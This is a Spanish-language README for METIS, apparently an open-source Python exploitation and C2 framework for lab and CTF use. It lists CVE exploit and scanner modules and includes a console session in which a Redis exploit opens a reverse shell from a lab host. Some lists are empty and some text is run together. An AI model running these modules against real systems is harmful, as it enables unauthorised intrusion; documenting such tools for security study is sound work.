Marco de explotación modular en Python con una consola estilo Metasploit, módulos Exploit y Auxiliary con autorregistro, comprobaciones de tres estados y múltiples transportes de sesión para objetivos de laboratorio y CTF.
███╗ ███╗███████╗████████╗██╗███████╗
████╗ ████║██╔════╝╚══██╔══╝██║██╔════╝
██╔████╔██║█████╗ ██║ ██║███████╗
██║╚██╔╝██║██╔══╝ ██║ ██║╚════██║
██║ ╚═╝ ██║███████╗ ██║ ██║███████║
╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═╝╚══════╝
Un marco de explotación en Python creado para el aprendizaje. Arquitectura modular, consola con temas, múltiples transportes de sesión y una biblioteca creciente de módulos CVE.
METIS es un marco de investigación de seguridad impulsado por la comunidad. El objetivo es construir una colección creciente de módulos aportados por investigadores de seguridad, desarrolladores y la comunidad en general.
¿Tienes un escáner útil, un módulo auxiliar, un módulo de explotación u otra herramienta de investigación de seguridad que te gustaría compartir? Añádelo a METIS y abre un Pull Request.
Todas las contribuciones son bienvenidas, siempre que sigan la estructura de módulos del proyecto, los estándares de código y las directrices de uso autorizado.
Ya sea que estés añadiendo un nuevo módulo CVE, mejorando un módulo existente, corrigiendo un error o construyendo nueva funcionalidad del marco, tus contribuciones pueden ayudar a hacer METIS mejor para todos.
Consulta Escribir módulos a continuación para obtener información sobre cómo crear tu propio módulo.
METIS es un marco modular de C2/explotación escrito en Python. Ejecuta una consola interactiva al estilo Metasploit donde seleccionas módulos, configuras opciones, ejecutas comprobaciones y estableces sesiones contra objetivos de laboratorio.
Está diseñado para:
No está diseñado para:
.py en modules/ y se registra automáticamenteExploit (genera sesiones) y Auxiliary (escáneres, enumeradores)check() de tres estados — cada módulo puede verificar antes de atacar (VULNERABLE / SAFE / UNKNOWN)file: con barras de progreso en vivoKEY=VALUE| Módulo | Descripción |
|---|---|
auxiliary/scanner/tcp_connect | Escáner de puertos TCP con hilos |
auxiliary/scanner/hikvision_cve_2017_7921 | Bypass de autenticación + enumeración de usuarios en cámaras IP Hikvision |
auxiliary/scanner/mikrotik_winbox_creds_cve_2018_14847 | Fuga de credenciales de MikroTik WinBox |
auxiliary/scanner/redis_cve_2022_0543 | Detector de escape del sandbox Lua de Redis |
| Módulo | Tipo de sesión |
|---|---|
exploit/unix/ftp/vsftpd_234_backdoor | Socket de escucha |
exploit/multi/http/ghost_cms_handlebars_rce | Socket inverso |
exploit/multi/http/langflow_rce_cve_2026_9198 | Socket inverso |
exploit/multi/http/budibase_plugin_upload_rce_cve_2026_31816 | Socket inverso |
exploit/multi/http/activemq_jolokia_rce_cve_2026_34197 | Socket inverso |
exploit/multi/http/tomcat_put_rce_cve_2017_12615 | Socket inverso |
exploit/multi/http/joomla_jce_rce_cve_2026_48907 | Webshell HTTP |
exploit/linux/http/freepbx_sqli_rce_cve_2025_57819 | Inverso retardado (cron) |
exploit/linux/redis/redis_cve_2022_0543_rce | Socket inverso |
exploit/linux/ssh/libssh_auth_bypass_cve_2018_10933 | Canal Paramiko |
exploit/linux/telnet/inetutils_telnetd_bypass_cve_2026_24061 | Socket telnet crudo |
Requiere Python 3.10+ y git.
git clone https://github.com/K3ysTr0K3R/METIS.git
cd METIS
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt
requirements.txt:
pwntools>=4.11.0
requests>=2.31.0
paramiko>=3.0.0
redis>=5.0.0
cryptography>=42.0.0
rich>=13.7.0
prompt_toolkit>=3.0.43
Ejecutar:
python3 metis.py
metis > show modules
# Module Date Rank Chk Description
-- ------------------------------------------------------------ ---------- --------- --- -----------
1 auxiliary/scanner/hikvision_cve_2017_7921 2017-09-23 normal Yes Hikvision IP Camera Authentication Bypass (CVE-2017-7921)
2 auxiliary/scanner/mikrotik_winbox_creds_cve_2018_14847 2018-08-01 great Yes MikroTik WinBox Credential Leak (CVE-2018-14847)
...
15 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent Yes vsftpd 2.3.4 Backdoor Command Execution
metis > search redis
# Module Date Rank Chk Description
-- ------ ---- ---- --- -----------
1 auxiliary/scanner/redis_cve_2022_0543 2022-02-18 excellent Yes Redis CVE-2022-0543 Scanner
2 exploit/linux/redis/redis_cve_2022_0543_rce 2022-02-18 excellent Yes Redis CVE-2022-0543 Lua Sandbox Escape RCE
metis > use 2
[*] using exploit/linux/redis/redis_cve_2022_0543_rce
metis exploit(linux/redis/redis_cve_2022_0543_rce) > set RHOST 192.168.56.101
[+] RHOST => 192.168.56.101
metis exploit(linux/redis/redis_cve_2022_0543_rce) > set LHOST 192.168.56.1
[+] LHOST => 192.168.56.1
metis exploit(linux/redis/redis_cve_2022_0543_rce) > check
[*] check: probing 192.168.56.101:6379
[VULNERABLE] check: 192.168.56.101 vulnerable to CVE-2022-0543
[*] check -> vulnerable
metis exploit(linux/redis/redis_cve_2022_0543_rce) > exploit
[*] running check() before exploit (AUTOCHECK=true)
[VULNERABLE] check: 192.168.56.101 vulnerable to CVE-2022-0543
[+] target appears vulnerable — proceeding
[*] listening on 192.168.56.1:4444 for reverse shell
[+] shell from 192.168.56.101:51234
[+] new session: <Session a3f2b1c4 192.168.56.101:51234>
metis exploit(linux/redis/redis_cve_2022_0543_rce) > sessions
a3f2b1c4 192.168.56.101:51234 (alive)